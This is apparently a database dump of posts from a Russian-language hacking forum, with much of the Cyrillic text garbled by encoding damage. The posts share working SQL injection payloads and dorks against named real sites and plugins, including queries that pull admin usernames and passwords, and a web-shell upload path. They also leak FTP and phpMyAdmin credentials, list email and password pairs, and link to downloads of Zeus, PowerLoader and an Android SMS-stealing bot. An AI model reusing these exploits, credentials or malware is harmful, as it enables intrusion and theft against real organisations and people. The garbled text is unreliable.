!!\r\n[code]http://www.thaimail.com/chkuser.php?uid=qwerty\'+and+1=\'2\'+union+select+123+--+[/code]\r\n\r\nÃâ€Ã¾Ã¿Ã¸ÑÂыòðõü into outfile ø ûьёüÑÂѠýþ ýðôþ тþûьúþ ÿþôþñрðть ÿðÿþчúу)\r\n\r\n\r\nÃ’ ôðýýыù üþüõýт ñô ûõöøт (òøôðть úтþтþ ýðшёû time based ø ôþûóþ úрутøû õóþ). Úðúтþûьúþ рðñþтð òþ÷þñýþòøтÑÂѠñуôу ÿрþñþòðть ÷ðûøòðть фðùûы ò ýðùôõýýыõ ÿðÿþчúø. ×ð шõûû + ú úðрüõ þñõÑÂÿõчõý :)', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1096, 1064, 1093, 'Psych0tr1a', 11, '', 1403528673, '[QUOTE=unknown_evil;1093]ÃÂтþ ÑÂúуûѠò ÑÂþфтõ у _http://www.emarsys.com/ru/[/QUOTE]\r\n\r\nÃÂð þôýþü ø÷ хþÑÂтþò ebay', 1, 0, '141.101.75.20', 0, 1, 0, 0, 0),
(1097, 1064, 1096, 'w0rm', 1, '', 1403528791, 'ÑÂтþ þñûðúþ. òÑÂõ ðôüøýúø úþýõúтÑÂÑ‚ÑÂѠú 1 ñô.\r\n[code]\r\nfiletype:php inurl:/u/gm.php?prm=\r\n[/code]\r\nnew dork\r\n\r\n[url]https://www.emarsys.net/u[/url] \r\nï‚ [url]https://www1.emarsys.net/u[/url] \r\nï‚ [url]https://login.emarsys.net/u[/url] \r\nï‚ [url]https://suite.emarsys.net/u[/url] \r\nòÑÂõü чøтðть\r\n[url]http://documentation.emarsys.com/?page_id=205[/url]\r\n[code]\r\n_ttp://documentation.emarsys.com/wp-content/uploads/HTTP-Feeds-in-Suite-English.pdf_. \r\n_http://documentation.emarsys.com/?page_id=199\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1098, 1072, 0, 'skiffha', 10, 'Dexter 1-2', 1403529985, 'Úтþ ò тõüõ тþт ÿþùüёт чтþ ÑÂтþ)\r\n\r\nPwd - w0rm.pw\r\n________________________v1___________________________________\r\n_https://mega.co.nz/#!pU1wWBDb!cK1uCpfObTKEiy31AWDVbbznjJgZ7-r8yQJvFbzVZQQ\r\n________________________v2___________________________________\r\n_https://mega.co.nz/#!hJEjHIJD!r0xMwyoi1BWsAt6ue3Vi_LX7MLJL5Qt-7l4B-KskY8s\r\n_____________________________________________________________', 1, 0, '141.101.104.159', 0, 1, 0, 0, 0),
(1102, 1076, 0, 'skiffha', 10, 'Android bot Stoned Cat', 1403536317, '[QUOTE]\r\náтðýôðртýыù òøô ÑÂþфтð ÑÂтþ Addobe Flash Player (ßþÑÂûõ уÑÂтðýþòúø þÑÂтðётÑÂѠтþûьúþ øúþýúð) ýþ ýð ÷ðúð÷ üы üþöõü ÑÂôõûðть òðü ûюñþù òøô.\r\n\r\näуýúцøþýðû:\r\n- ×ðÿрþѠDevice Administration ø öõÑÂтúðѠуÑÂтðýþòúð (ãôðûøть üþöýþ тþûьúþ ÑÂñрþÑÂþü ýðÑÂтрþõú ýð\r\n÷ðòþôÑÂúøõ, тðú öõ ÿрø ÑÂтþü òÑÂÑ‘ ÑÂýþÑÂøтÑÂÑÂ).\r\n- Óрðñøýó òÑÂõù øýфþрüðцøø þ тõûõфþýõ (Phone Number,Country,IMEI,Model,OS)\r\n- ßõрõхòðт òÑÂõх òхþôÑÂщøх SMS ÿþ úþüüðýôõ.\r\n- áüõýð уÿрðòÃȄÂющõóþ ýþüõрð/URL ðôüøýúø úþüðýôþù, þôýþüу ñþту øûø òÑÂõüу ñþтýõту(тõÿõрь ýõ ÿþтõрÑÂõтõ ñþтþò ýøúþóôð).\r\n- ØÑÂÿþûýõýøõ USSD úþôþò (ßõрõðôрõÑÂðцøѠ÷òþýúþò ø â.Ãâ€.)\r\n- ßрþÑÂûушúð òхþôÑÂщøх/øÑÂхþôÑÂщøх SMS ÿþ úþüðýôõ .\r\n- Þтÿрðòúð SMS ýð ûюñþù ýþüõр ò ÑÂúрытþü рõöøüõ.\r\n- Ã’ ÿûðýðх þчõýь üýþóþõ...\r\n\r\nÃÂôüøý ÿðýõûь ûõóúþ ÑÂтðòøтÑÂѠø ýðÑÂтрðõòðõтÑÂѠýð Api òÑÂÿþüþóðтõûьýых ÑÂõрòøÑÂþò\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!9U8yCTJJ!ZIC6KwQ9lwvS4zZaHHxnOPuujbBbNHnsKyd2vwEZlBs', 1, 0, '108.162.218.41', 0, 1, 0, 0, 0),
(1100, 1074, 0, 'skiffha', 10, 'Zeus All version and modification', 1403534333, 'Ã’ÑÂõ òõрÑÂøø ø üþôы òõûøúþóþ ø üþóучõóþ)))\r\n\r\nPwd - w0rm.pw\r\n\r\n____________Zeus_2.0.8.9__________________\r\n_https://mega.co.nz/#!0AdDRCbD!3PFt1v51vvuzlCdcnYDGfAwkRb90z2Uy7vW0IW0aEZU\r\n____________Zeus_2.0.9.15_________________\r\n_https://mega.co.nz/#!1B8knSwb!mkkdUIFsdXhUDhlvAPK71gfBBbgnPVbCCi9H_n8ExkE\r\n____________Zeus_Evolution________________\r\n_https://mega.co.nz/#!4IV0iBTA!F1O4mOdaVUa1IL_1Qy6a5lNLJix_qobP9wVeEsshGic\r\n_________________________________________', 1, 0, '141.101.98.87', 0, 1, 0, 0, 0),
(1101, 1075, 0, 'skiffha', 10, 'PowerLoader', 1403534507, '[QUOTE]\r\n[ÞÿøÑÂðýøõ ûþðôõрð]\r\n\r\n- ßрøòðтýыõ þñхþôы ÿрþðúтøòýых ÷ðщøт, ýõÑÂúþûьúþ ÿрøòðтýых ÑÂÿþÑÂþñþò òýõôрõýøѠò ÑÂøÑÂтõüу.\r\n- ØÑÂÿþûь÷уõт ÿрøòðтýыù ÑÂÿþÑÂþñ òýõôрõýøõ ò ôþòõрõýýыù ÿрþцõÑÂÑÂ(32bit/64bit), ò ÿрþцõÑÂÑÂðх ýõ òõÑÂøт.\r\n- Þñхþôы рõðûø÷þòðýы ø рðñþтðют ýð òÑÂõх ÑÂøÑÂтõüðх (xp/server/vista/7, user/admin, uac/on/off, 32bit/64bit).\r\n- Þñхþôøт 32bit/64bit: Outpost, ComodoIs2012, Kis2013, Avg2013, ZoneAlarm, Avast, Dr.Web, F-Secure ø üýþóøõ ôруóøõ.\r\n- ×ðщøтð ø ÑÂúрытøõ ûþðôõрð, òþÑÂÑÂтðýþòûõýøõ ÑÂòþøх фðùûþò, ÑÂûучðùýыõ øüõýð фðùûþò.\r\n- Òýõôрõýøõ üþôуûõù(ôûû) ò ÑÂþ÷ôðòðõüыõ ÿрþцõÑÂÑÂÑ‹ 32bit/64bit.\r\n- Üþôуûø(ôûû) хрðýÑÂÑ‚ÑÂѠò ÷ðшøфрþòðýýþü òøôõ ø òýõôрÑÂÑŽÑ‚ÑÂѠò ýуöýыõ ÿрþцõÑÂÑÂÑ‹ ûþðôõрþü.\r\n- ÃÂõ ÑÂñрðÑÂыòðõт ýøúðúøõ ÑÂтþрþýýøõ фðùûы ýð ôøÑÂú, ÿþôýÑÂтøõ integrity level õÑÂûø ýуöýþ.\r\n- Ã’ ÑÂøÑÂтõüõ þÑÂтðõтÑÂѠø рðñþтðõт тþûьúþ þôøý ýðш фðùû exe(32bit) úрøÿтуõü тþûьúþ õóþ.\r\n- à ðñþтð Ñ ÑÂõтью ýõ÷ðüõтýþ ôûѠфðõрòþûþò, трðфøú шøфруõт rc4, ÿþôôõрöøòðютÑÂѠрõ÷õрòýыõ ÑÂõрòõрð.\r\n- ÃՄ܄Âþúøù þтÑÂтуú ø ûðùфтðùü.\r\n\r\n[ÃÂôüøý ÿðýõûь]\r\n\r\n- ãôþñýðѠÿрþÑÂтðѠø üýþóþфуýúцøþýðûьýðѠðôüøý ÿðýõûь.\r\n- Úþüðýôы ýð ÷ðóру÷úу ø ÷ðÿуÑÂú фðùûþò рð÷ýыüø ÑÂÿþÑÂþñðüø, ÷ðóру÷úу ø ÷ðÿуÑÂú üþôуûõù(ôûû).\r\n- à õôðúтøрþòðýøõ úþýфøóð, þñýþòûõýøõ ûþðôõрð, рð÷ûøчýыõ ýðÑÂтрþùúø.\r\n- ßþôрþñýðѠÑÂтðтøÑÂтøúð ÿþ ôðтðü/ñøûôðü/ÑÂтрðýðü/þÑÂ, öøòыõ/üõртòы/þýûðùý/ýþòыõ ñþты.\r\n- Ãâ€Ã¾Ã±Ã°Ã²Ã»ÃµÃ½Ã¸Ãµ ÷ðôðýøù ÿþ ÑÂтрðýðü/ñøûôðü òÑÂõ ýõþñхþôøüыõ þÿцøø.\r\n[/QUOTE]\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!EdMTESAB!ht7fppVqPe_T4FkT_hS_UUJTyj1jzK4hRURUvpy7h_0', 1, 0, '141.101.98.87', 0, 1, 0, 0, 0),
(1111, 1064, 1110, 'w0rm', 1, '', 1403546137, 'þтÿþÑÂтø ÑÂтруúтуру úþтþрую уôðûþÑÂÑŒ ÑÂþñрðть ÿþ ñô ýðôþ ôþúручøòðть ýþрü ÑÂûþòðрь Ѡôуüðю ø ñрутøть üуÑÂúуû', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1110, 1064, 1109, 'null', 9, '', 1403545937, 'ñþûьшõ ýõт üыÑÂûõù, òрþôõ ø ÿðÑÂÑ‹ õÑÂть ýþ úуôð øх ÿрøòõрýуть хõр ÷ýðõт', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(1109, 1064, 1108, 'w0rm', 1, '', 1403545735, 'ýõ ÑÂрðñþтðûþ', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1107, 1064, 1105, 'w0rm', 1, '', 1403540566, 'Ѡýõ üþóу ÿþÿðÑÂть òþ òýутрь ýõту ôðýýых\n\n[url]https://us.emarsys.net/web-console/[/url]\n[url]https://si.emarsys.ne[/url]\n\n[url]http://bgp.he.net/net/91.194.249.0/24#_dns[/url]\n[url]http://bgp.he.net/net/217.175.192.0/20#_dns[/url] - ÿþчтþòøчúø\n\nчõт Ѡÿþô÷ðÑÂтрÑÂû.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1105, 1064, 1097, 'null', 9, '', 1403538615, '[quote=w0rm;1103][url]https://www.emarsys.net/u[/url] \r\nï‚ [url]https://www1.emarsys.net/u[/url] \r\nï‚ [url]https://login.emarsys.net/u[/url] \r\nï‚ [url]https://suite.emarsys.net/u[/url] \r\nòÑÂõü чøтðть\r\n[code]\r\n_ttp://documentation.emarsys.com/wp-content/uploads/http-feeds-in-suite-english.pdf_. \r\n_http://documentation.emarsys.com/?page_id=199\r\n[/code][/quote]\r\n\r\nÿрþчøтðû, úðú ѠÿþýÑÂû ÑÂтþ ðôüøýø ÿþûь÷þòðтõûõù? ð ñрðу÷õрþü úðúøü ûþóøýøшьÑÂÑÂ?', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(1104, 1064, 1097, 'null', 9, '', 1403537298, '[QUOTE=w0rm;1103]_ttps://l.emarsys.net/\r\n_ttp://emarsys.net/\r\n\r\nóôõ öõ ðôüøýúð тþ[/QUOTE]\r\n\r\nÜýþóþ ÿþûь÷þòðтõûõù ýðÑÂþñøрðû?', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(1106, 1077, 0, 'skiffha', 10, 'hermes aka tatanga', 1403539034, 'ßþчøтðть ÿрþ ÑÂтþ üþöýþ ýøöõ\r\n\r\n\r\n__________________ßрþ_ÑÂðüþ_ôõтøщõ______________________\r\n_http://www.xylibox.com/2012/08/tick-panel-hermestatanga.html\r\n\r\n_http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1755&sid=81c70ce4889488d51f868147b9d1d396\r\n_______________________________________________________\r\n\r\nPwd - w0rm.pw\r\n\r\n_https://mega.co.nz/#!EEkASaZR!usGmvOp5EMNO0gFs2eLw4fmZtI8zW8oOQAav6MdJl0o\r\n_______________________________________________________', 1, 0, '108.162.254.37', 0, 1, 0, 0, 0),
(1108, 1064, 1107, 'null', 9, '', 1403544556, '[url]https://e4.kupikupon.ru/cm/custlogin.php[/url]\r\n\r\nчõрõ÷ post ÿðрðüõтр\r\ncompany=e&login=custlogin.php&login_type=&password=e&remember=remember&session_id=&uri=&username=e\r\n\r\nÿþÿрþñуù', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(1048, 1042, 0, 'w0rm', 1, '[sql-inj] com_jvideoclip Joomla', 1403410794, 'ãÑÂ÷òøüþÑÂть ò Joomla. Øôõю þ ýðûøчøø ñðóø ò þôýþü ø÷ úþüÿþýõýтþò ÿþôúøýуû уòðöðõüыù üýõ чõûþòõú. à ðÑÂúручøòðû ñðóу ÑÂðü)))\r\n\r\nGoogle Dork : - \"index.php?option=com_jvideoclip\"\r\n\r\náÿûþøт:\r\n[code]\r\nindex.php/component/jvideoclip/index.php?option=com_jvideoclip&searchtxt=%27%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,concat%28char%28116,116,116,116,32%29,username,0x3a,password,0x3a,usertype,char%2832,116,116,116,116%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20+from+jos_users+where+usertype=char%2883,117,112,101,114,32,65,100,109,105,110,105,115,116,114,97,116,111,114%29+or+usertype=char%2865,100,109,105,110,105,115,116,114,97,116,111,114%29%20--%20;--%20-&view=search\r\n\r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1049, 1043, 0, 'w0rm', 1, 'Ñðýú Þтúрытøõ', 1403410906, 'Сливал давно с бажного FTP-сервера. нÂасÂколько информация актуальна, и есть ли, что-нибудь интересное - сÂложно сÂказать. Внутри конфиги, логи, часÂть архивов под паролем, сÂофт(ключи, кейгены) и т.д.\n\n[URL=\"https://mega.co.nz/#!vNFDATaK!C2VeqzkloRXApMJl5Uee2x2j7TsH2Hkj-QZR_fu3UtI\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1050, 1044, 0, 'w0rm', 1, 'Community-Now! Data Becker', 1403411010, 'áûучðùýþ úþóôð-тþ ýðтúýуÃȄÂѠýð ÑÂтþ чуôþ.\r\nÃâ€Ã°Ã½Ã½Ã°Ñ ÑÂñþрúð уöõ òрþôõ ýõ ÿþôôõрöøòðõтÑÂѠрð÷рðñþтчøúðüø уöõ ûõт 5, ýþ ýð ÿрþÑÂтþрðх øýтõрýõтð òÑÂõ õщõ ÿþûýþ ÑÂðùтþò úþтþрыõ õщõ ÿþûь÷уютÑÂѠõù.\r\n\r\nDork: \"brdIndex.php?action=board&nId=[sqlinj]\"\r\n\r\nãÑÂ÷òøüыù úуÑÂþú úþôð, þñрõ÷ðû ûøшýõõ:\r\n\r\n[code]:\r\n### START view board\r\n\r\nif(!$oSql->fCheckValue(\"brd_board\", \"nBrdId\", $_GET[\'nId\'])) fShowInvalidLink();\r\nif(!fCheckPermission(\"brdAdmin\") && $oSql->fOne(\"SELECT nActive FROM \".DBPREFIX.\"brd_board\r\nWHERE nBrdId = \".$_GET[\'nId\']) == 0) fShowInvalidLink();\r\n\r\nif(!fCheckPermission(\"brdAdmin\")) {\r\n$aGroups = (Array)$oSql->fOne(\"SELECT nGrpId FROM \".DBPREFIX.\"brd_group2board\r\nWHERE nBrdId = \".$_GET[\'nId\']);\r\nif(count($aGroups) != 0 && count(array_intersect($aGroups, fGetUsergroups())) == 0) {\r\nfShowNoAccess();\r\n}\r\n}\r\n\r\nwhile($drThread = $oSql->fFetch($dqThread)) {\r\n\r\n$dqLastpost = $oSql->fQuery(\"SELECT a.*, b.sNameUser FROM \".DBPREFIX.\"brd_post a, \".DBPREFIX.\"sys_user b\r\nWHERE b.nUsrId = a.nUsrId\r\nAND a.nThrId = \'\".$drThread[\'nThrId\'].\"\'\r\nORDER BY uPosttime DESC\r\nLIMIT 1\");\r\n$drLastpost = $oSql->fFetch($dqLastpost);\r\n\r\n$dqBoard = $oSql->fQuery(\"SELECT * FROM \".DBPREFIX.\"brd_board\r\nWHERE nBrdId = \'\".$_GET[\'nId\'].\"\'\");\r\n$drBoard = $oSql->fFetch($dqBoard);\r\n\r\n$eId = $_GET[\'nId\'];\r\n$eTitle = $drBoard[\'sName\'];\r\n$ePages = fGenPages(\"brdIndex.php?action=board&nId=\".$_GET[\'nId\'], $page, $nPages);\r\n\r\n### END view board\r\n[/code]\r\nÚðú òøôøü, ýðшð ÿõрõüõýýðѠnId ýøúðú ýõ фøûьтруõтÑÂÑÂ.\r\n\r\nØÑÂÿþûь÷уѠError-Based üõтþôы üы ûõóúþ òыòþôøü ÿðрþûь ø ûþóøý ðôüøýøÑÂтрðтþрð.\r\n[code]\r\nbrdIndex.php?action=thread&nId=107\' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT CONCAT_WS(0x3a,nUsrId,sNameUser,mPassword) FROM cn1_sys_user limit 0,1),FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)b GROUP BY x)a) AND \'1\'=\'1&nGoto=755&PHPSESSID=ceedab5a8747d05a0be34b12f8cb608f&print=yes&PHPSESSID=ceedab5a8747d05a0be34b12f8cb608f\r\ntable_name = cn1_sys_user\r\ncolumn_name = sNameUser,mPassword\r\n[/code]\r\nßðрþûь ÷ðшøфрþòðý ò md5() ÿþÑÂтþüу ôуüðю труôð ýõ ÑÂþÑÂтðòøт õóþ рðÑÂшøфрþòðть.\r\n\r\n×ÃÂÛØÒÚàèÕÛÛÃÂ:\r\n\r\nÃâ€Ã°Ã»ÑŒÑˆÃµ úþóôð üы ÿþûучøûø, ôðýýыõ ôûѠòхþôð, ðòтþрø÷уõüÑÂѠýð фþруüõ. ÃËœ ÑÂüþтрøü õÑÂть ûø ýð ýõü \"ÓðûõрõÑÂ\", хþчу ÷ðüõтøть, чтþ õõ üþöõт ø ýõ ñыть, ýõ òÑÂõ ÿþ уüþûчðýøю õõ уÑÂтðýðòûøòðют. ÃÂþ уòы ÷ðûøòúð тþûьúþ чõрõ÷ ýõõ!\r\n\r\nÃâ€Ã°Ã»ÑŒÑˆÃµ öüõü \"ãÿрðòûõýøõ\", ÿõрõхþôøü ò \"Þÿцøø\" ø òыñøрðõü \"ÓðûõрõÑÂ\".\r\nâðü üы òøôøü ÿþûõ \"à ð÷рõшõýýыõ тøÿы фðùûþò (ßрþчøõ фðùûы Ѡ÷ðÿÑÂтþù)\" ôþÿøÑÂыòðõü тþ рðÑÂшøрõýøõ úþтþрþõ òы хþтøтõ, ýðÿрøüõр à ÃÂà .\r\n\r\nÃâ€Ã°Ã»ÑŒÑˆÃµ ÑÂþхрðýÑÂõü ø ÷ðхþôøü ò ÑÂðüу Óðûõрõю. Þтúрыòðõü ûюñþù ðûьñþü øûø ÑÂþ÷ôðõü ýþòыù ø òыñøрðõü \"Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ñ‚ÑŒ фðùû\". âðü öõ ñуôут уúð÷ðý òõÑÂÑŒ ÑÂÿøÑÂþú фðùûþò рð÷рõшõýýыù ôûѠ÷ðóру÷úø ÿрþòõрÑÂõü õÑÂть ûø ýðш à ÃÂà , õÑÂûø ôð, тþ òÑÂõ хþрþшþ òыñøрðõü ýðш фðùû ø ÿøшõü ýð÷òðýøõ. ÃËœ öüõü ÑÂþхрðýøть, ÿþÑÂûõ ÷ðóру÷úø фðùû ñуôõт ÑÂрð÷у òøôõý ò ÑÂÿøÑÂúõ, õÑÂûø ýõт, тþ þý ñуôõт ôþÑÂтуÿõý ÿþ ðôрõÑÂу: http:/site.com/imgImages/shell.php\r\n\r\náþòõтую, уñрðть рð÷рõшõýýыõ тøÿы фðùûþò ø ÿрþчøõ üõûþчø ÷ð ÑÂþñþù!', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1047, 1041, 0, 'w0rm', 1, 'Wordpress like-dislike-counter-for-posts-pages-and-comments plugin SqlInjection', 1403410709, 'Signature:\r\nWordpress like-dislike-counter-for-posts-pages-and-comments plugin\r\n\r\n\r\nVulnerable Code(mint.php):\r\nPHP úþô:\r\n$post_id=$_POST[\'post_id\']; \r\n$up_type=$_POST[\'up_type\']; \r\nif($up_type==\'c_like\'||$up_type==\'c_dislike\') \r\n{ \r\n$for_com=\'c_\'; \r\n} \r\nelse \r\n{ \r\n$for_com=\'\'; \r\n} \r\nif(!in_array($for_com.$post_id,$posts_present)) \r\n{ \r\nupdate_post_ul_meta($post_id,$up_type); \r\n} \r\necho get_post_ul_meta($post_id,$up_type); \r\n\r\nVia get_post_ul_meta function (ldclite-function.php):\r\nPHP úþô:\r\nfunction get_post_ul_meta($post_id,$up_type) \r\n{ \r\n global $wpdb; \r\n $table_name = $wpdb->prefix.\"like_dislike_counters\"; \r\n $sql=\"select ul_value from $table_name where post_id=$post_id and ul_key=\'$up_type\' ;\"; \r\n $to_ret=$wpdb->get_var($sql); \r\n if(empty($to_ret)) \r\n { \r\n $to_ret=0; \r\n } \r\n return $to_ret; \r\n} \r\n\r\n\r\nPOC:\r\nvictim/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php\r\nPOST:up_type=c_like&post_id=781523+union+select+1--+\r\n\r\n\r\n\r\nßðрðüõтр post_id þñÑÂ÷ðý ñыть òðûøôýыü.\r\n\r\nÃÂúтуðûьýþ: <=1.2.2', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1046, 1040, 0, 'w0rm', 1, 'alfabank.com.ua [sql-inj]', 1403410427, '_ttp://www.alfabank.com.ua/rus/retail/credits/pil/?s_bnr?s_bnr\r\nуÑÂ÷òøüыõ post ÷ýðчõýøѠ- operator,phone,inn\r\n\r\nýõ üþóу ýðùтø ðôüøýúу..', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1045, 1039, 0, 'w0rm', 1, 'ftp\'s', 1403410367, '[url]ftp://ftp_cr:!2345q@ftp.is-pro.ru[/url]\r\n\r\nà ð÷рðñþтчøú ÑÂøÑÂтõüы Øá-ßà Þ - úþüÿðýøѠ«Ã˜ýтõûûõúт-áõрòøÑ». ÚþüÿðýøѠ\"Øýтõûûõúт-áõрòøÑÂ\", þÑÂýþòðýýðѠò 1990 óþôу, ÑÂòÃȄÂõтÑÂѠþôýøü ø÷ ûøôõрþò рþÑÂÑÂøùÑÂúþóþ рыýúð ò þñûðÑÂтø øýфþрüðцøþýýых тõхýþûþóøù. ßþ øтþóðü 2003ó. ÑÂþóûðÑÂýþ ôðýýыü рõùтøýóþòþóþ ðóõýтÑÂтòð \"ÃÂúÑÂÿõрт à ÃÂ\" úþüÿðýøѠòхþôøт ò âÞà -100 ÑÂðüых òûøÑÂтõûьýых úþýÑÂðûтøýóþòых úþüÿðýøù ø ò âÞà -50 òõôущøх рð÷рðñþтчøúþò úþüÿьютõрýых ÿрþóрðüü à þÑÂÑÂøø.\r\n\r\nÚþüÿðýøѠ\"Øýтõûûõúт-áõрòøÑÂ\" Ñ 1990 óþôð ÷ðýøüðõтÑÂѠрð÷рðñþтúþù ø òýõôрõýøõü ÑÂøÑÂтõü ðòтþüðтø÷ðцøø úþрÿþрðтøòýþóþ уÿрðòûõýøÑÂ. ÚþüÿðýøѠøüõõт þфøÑÂÑ‹ ò ÜþÑÂúòõ ø Úøõòõ ø ÿðртýõрÑÂúую ÑÂõть ÿþ ÑÂøÑÂтõüõ Øá-ßà Þ ÿþ óþрþôðü à þÑÂÑÂøø ø ãúрðøýы\r\n\r\n[url]ftp://delor:7476810@ftp.parus.ru[/url]\r\n\r\nÚþüÿðýøѠòõôõт ÑÂòþю øÑÂтþрøю Ñ 1990 óþôð, úþóôð ñыûø рð÷рðñþтðýы ÿõрòыõ ÿрþóрðüüы \"ßÃÂà ãá\" ôûѠрðÑÂчõтð ÷ðрðñþтýþù ÿûðты. ×ð òрõüѠÑÂòþõù ôõÑÂтõûьýþÑÂтø \"ÚþрÿþрðцøѠßÃÂà ãá\" ÑÂтðûð þôýøü ø÷ úруÿýõùшøх рþÑÂÑÂøùÑÂúøх рð÷рðñþтчøúþò ßÞ ø ÿþÑÂтðòщøúþò Øâ-уÑÂûуó. Üы ÑÂþ÷ôðûø þôýу ø÷ ýðøñþûõõ шøрþúøх рõóøþýðûьýых ÑÂõтõù ýð рþÑÂÑÂøùÑÂúþü Øâ-рыýúõ ø ÑÂтðûø ýðôõöýыü ÿðртýõрþü ôûѠтыÑÂÑÂч þрóðýø÷ðцøù - þрóðýþò òûðÑÂтø ø üõÑÂтýþóþ ÑÂðüþуÿрðòûõýøÑÂ, óþÑÂуôðрÑÂтòõýýых ø üуýøцøÿðûьýых учрõöôõýøù, úруÿýых тõррøтþрøðûьýþ-рðÑÂÿрõôõûõýýых úþрÿþрðцøù ø þтрðÑÂûõòых ýðучýþ-øÑÂÑÂûõôþòðтõÃȄ΄Âúøх øýÑÂтøтутþò.\r\n\r\nÃ’ þтòõт ýð óþÑÂуôðрÑÂтòõýýыõ рõфþрüы ø ø÷üõýõýøѠñø÷ýõÑÂ-ÑÂрõôы \"ÚþрÿþрðцøѠßÃÂà ãá\" òÑÂõóôð ÿрõôûðóðõт ÑÂффõúтøòýыõ üþôõûø Øâ-ÿþôôõрöúø ýþòых ÷ðôðч ø ÿрøýцøÿþò уÿрðòûõýøÑÂ. Úûøõýты цõýÑÂÑ‚ ýðшø тõхýþûþóøø ÷ð òþ÷üþöýþÑÂть рõшõýøѠôõùÑÂтòøтõûьýþ ÑÂûþöýых ÿþ üõтþôþûþóøø ø üðÑÂштðñу ÷ðôðч.', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1112, 1064, 1111, 'null', 9, '', 1403547895, 'áтруúтурð ÑÃâ€\r\n\r\naccount\r\n--city\r\n--email\r\n--id\r\n--name\r\n--phone\r\n--status\r\n\r\nadministrator\r\n--customer\r\n--email\r\n--gid\r\n--id\r\n--password\r\n--status\r\n--title\r\n--username\r\n\r\ncontent\r\n--admin\r\n--customer\r\n--id\r\n--name\r\n--status\r\n--url\r\n\r\ncustomers\r\n--city\r\n--email\r\n--gid\r\n--id\r\n--phone\r\n--status\r\n--username\r\n\r\ninfo\r\n--id\r\n--status', 1, 0, '141.101.105.221', 0, 1, 0, 0, 0),
(1052, 1046, 0, 'w0rm', 1, 'SQLi - RUTV; HitFM; DFM;', 1403411238, 'Ã’ ÿþøÑÂúðх ÑÂúуûø ýðтúýуÃȄÂѠýð ÑÂðùт [url]http://quantumart.ru/[/url]\r\n\r\nQuantumart - òõñ ÑÂтуôøÑÂ, øх рðñþты üы òÑÂõ ÷ýðõü [url]http://quantumart.ru/customers[/url] Úруÿýыõ ÿрþõúты.\r\n\r\nÃÂðшõû ÑÂúуûю [url]http://quantumart.ru/case_new.asp?oid=all+SQL[/url]\r\nÃ’ÑÂõ ÑÂðùты ýð ASP; MSSQL error based\r\n\r\nÃ’ÑÂõ úûøõýтÑÂúøõ ÑÂðùты ÿþôúûючõýы ú þôýþüу хþÑÂту, ÿþÑÂтþüу ñð÷ы RUTV; HitFM; DFM; тþöõ ôþÑÂтуÿýы.\r\n\r\nÃ’ ñð÷õ ûþóøýы ø ÿðрþûø ÿрøÑÂутÑÂтòуют +\r\nßуть ÑÂðùтþò C:\\Inetpub\\wwwroot\\quantumartru\\\r\n\r\nÃÂôüøýúð [url]https://backend.admin.qsupport.ru/backend/[/url]\r\nÞтúуôð ò÷ÑÂть Customer code - х÷', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1051, 1045, 0, 'w0rm', 1, 'rg.ru', 1403411109, 'ãÑÂ÷òøüþÑÂть ÑÂущõÑÂтòуõт ýð ÿþô ôþüõýõ. Verb Tampering bypass\r\nÞÑÂущõÑÂтòÃȄÂõтÑÂѠûøñþ чõрõ÷ netcat\r\nûøñþ ÿрÑÂüþ ò ñрðу÷õрõ чõрõ÷ ÿûðóøý ò фф Live HTTP Header\r\nçõрõ÷ nc:\r\nnc torpedo.rg.ru 80\r\nOPTIONS /admin_of_site/ HTTP/1.1\r\nHost: torpedo.rg.ru', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1043, 1038, 0, 'w0rm', 1, 'rog.asus.com', 1403410139, 'rog.asus.com\n\n\nphpmyadmin\n[url]http://rog.asus.com/ptdbadmin/[/url]\nuser:root\npass:asusadmindbmy\n\nWP\n[url]http://rog.asus.com/wp-login.php[/url]\n\n asadmin_rog1310\n\n[url]http://rog.asus.com/forum/[/url]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(2984, 1038, 1043, 'w0rm', 100, '', 1453533442, 'SQLi [url]http://www.gigabyte.com/products/list.aspx?s=42&p=344&v=1*[/url]', 1, 0, '141.101.80.16', 0, 1, 0, 0, 0),
(1042, 1037, 1041, 'w0rm', 1, '', 1403409908, '[code]\r\negorea1999@gmail.com:040c677126de6a856dab1f4cc5e126c1edbbd235 QAZWSX1999 \r\nadmin.info18@rambler.ru:08bc0f52b8915212aebdacb225aff3b333c73759 razdva3lista \r\nmaksimkinys@yandex.ru:5c249f2e116db60e92f15a5f87bdc5354bb031f1 19920707 \r\nvovalox1123@inbox.lv:601f1889667efaebb33b8c12572835da3f027f78 123123 \r\nstudio@sofpro.ru:dce37620eaf7dc0eeba8b005356308ddd125ce91 02011963 \r\nkovar.den@ya.ru:8875346d320ad6fe02daec9638a41374b79675ad \r\npgorum@mail.ru:ef374f99b3c424b2db2b4624e31ecfce08d34afb \r\nprofesor-1980@mail.ru:a7ff4e57cb8b85c439a049fa7f06d330095b47cb \r\njezebel@skunksworks.ru:6096992fcafb14b5a58a92cec4fa320fe07aa204 